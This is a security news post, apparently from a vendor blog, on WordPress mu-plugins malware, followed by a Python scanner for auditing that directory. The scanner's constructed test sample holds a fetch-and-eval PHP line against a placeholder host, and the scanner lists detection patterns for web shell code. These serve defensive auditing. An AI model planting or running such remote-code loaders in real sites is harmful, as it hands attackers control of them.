
WordPress Security Alert: Hackers Target mu-Plugins to Spread Malware and Spam

In a concerning trend for website security, hackers are exploiting the mu-plugins directory in WordPress to inject malicious code, redirect users to spam sites, and hijack images. This tactic allows them to maintain persistent access to compromised sites while evading detection.


Key Takeaways

  • Hackers are using the mu-plugins directory to conceal malware.

  • Three types of malicious PHP scripts have been identified.

  • Vulnerable plugins and themes are common entry points for attacks.

  • Regular updates and security audits are essential for WordPress site owners.

Understanding mu-Plugins

The term "mu-plugins" stands for must-use plugins: PHP files placed in wp-content/mu-plugins that WordPress loads automatically, without activation through the admin dashboard. This makes the directory attractive to cybercriminals, because code dropped there runs on every request and stays out of the standard plugin list, so site owners are less likely to notice it during routine checks.

Types of Malicious Code Found

Recent analyses have uncovered three distinct types of rogue PHP scripts within the mu-plugins directory:

  1. Redirect Script: Located in wp-content/mu-plugins/redirect.php, this script redirects visitors to external malicious websites, often disguised as a web browser update to trick users into downloading malware.

  2. Web Shell Functionality: The script in wp-content/mu-plugins/index.php allows attackers to execute arbitrary code by downloading remote PHP scripts, providing them with extensive control over the compromised site.

  3. Spam Injection: The wp-content/mu-plugins/custom-js-loader.php script injects unwanted spam content into the website, replacing images with explicit content and hijacking outbound links to promote scams or manipulate SEO rankings.

Current Threat Landscape

The exploitation of WordPress sites has escalated, with hackers using compromised platforms to deploy malicious JavaScript. This can redirect users to unwanted domains or act as skimmers to capture sensitive financial information during transactions.

The tactics employed by these threat actors include:

  • ClickFix Attacks: Using infected sites to trick visitors into executing malicious PowerShell commands under the guise of CAPTCHA verifications.

  • Data Theft: Deploying malware like Lumma Stealer to harvest sensitive information from users.

Common Vulnerabilities

While the exact methods of breach remain unclear, several common vulnerabilities have been identified as potential entry points for attackers:

  • Vulnerable Plugins/Themes: Outdated or poorly coded plugins and themes can provide easy access for hackers.

  • Compromised Admin Credentials: Weak passwords or stolen credentials can lead to unauthorized access.

  • Server Misconfigurations: Improperly configured servers can expose sites to various attacks.

Recent Vulnerabilities to Watch

A report from Patchstack highlights four critical vulnerabilities that have been actively exploited this year:

  1. CVE-2024-27956: An unauthenticated SQL execution vulnerability in the WordPress Automatic Plugin.

  2. CVE-2024-25600: A remote code execution vulnerability in the Bricks theme.

  3. CVE-2024-8353: An unauthenticated PHP object injection vulnerability in the GiveWP plugin.

  4. CVE-2024-4345: An arbitrary file upload vulnerability in Startklar Elementor Addons.

Best Practices for WordPress Security

To mitigate the risks associated with these threats, WordPress site owners should adopt the following best practices:

  • Regular Updates: Keep all plugins and themes up to date to patch known vulnerabilities.

  • Routine Audits: Regularly check for malware and suspicious code within the site.

  • Strong Passwords: Enforce strong password policies for all user accounts.

  • Web Application Firewalls: Implement firewalls to block malicious requests and prevent code injections.
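As an added illustration of the routine audit recommended above, applied to the three rogue file names listed under "Types of Malicious Code Found": a small Python scanner written for this page (not code from the article or its sources) that walks a mu-plugins directory, flags the reported file names, and flags content heuristics that are my own choices. The sample directory it builds is constructed test data, not real malware.

```python
import os
import re
import tempfile

# File names reported in the campaign described above (from the article).
KNOWN_ROGUE_NAMES = {"redirect.php", "index.php", "custom-js-loader.php"}

# Heuristic content indicators (my own choice, not from the article): remote
# fetching, dynamic code evaluation, obfuscation helpers and hard redirects.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    "dynamic_eval": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "header_redirect": re.compile(r"header\s*\(\s*['\"]Location:\s*https?://", re.I),
}

def scan_mu_plugins(mu_dir):
    """Return {relative_path: [reasons]} for files under mu_dir worth a manual look.
    A name match alone is only a hint (WordPress may ship a harmless index.php);
    content matches are what make a file worth reading in full."""
    findings = {}
    for root, _dirs, files in os.walk(mu_dir):
        for name in files:
            path = os.path.join(root, name)
            reasons = []
            if name.lower() in KNOWN_ROGUE_NAMES:
                reasons.append("name matches a file reported in this campaign")
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            reasons += [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(content)]
            if reasons:
                findings[os.path.relpath(path, mu_dir)] = reasons
    return findings

def build_sample_dir():
    """Write a constructed mu-plugins directory (test data, not real malware)."""
    mu_dir = tempfile.mkdtemp(prefix="mu-plugins-")
    samples = {
        "site-tweaks.php": "<?php\nadd_filter('the_content', 'strip_tags');\n",
        "redirect.php": "<?php\nheader('Location: https://example.invalid/update');\nexit;\n",
        "index.php": "<?php\neval(base64_decode(file_get_contents('https://example.invalid/x')));\n",
    }
    for name, body in samples.items():
        with open(os.path.join(mu_dir, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return mu_dir

if __name__ == "__main__":
    print(scan_mu_plugins(build_sample_dir()))
```

On a live site, point scan_mu_plugins at the real wp-content/mu-plugins path and read every flagged file in full; the heuristics are deliberately broad and will also match some legitimate plugins.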

By staying vigilant and proactive, WordPress site owners can significantly reduce the risk of falling victim to these malicious attacks. As cybercriminals continue to adapt their strategies, awareness and education remain crucial in combating these threats. Cybersecurity is critical. BetterWorld Technology offers cutting-edge solutions to combat evolving threats while driving innovation. Protect your business with confidence—contact us today for a consultation!

Sources

  • Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site Images, The Hacker News.
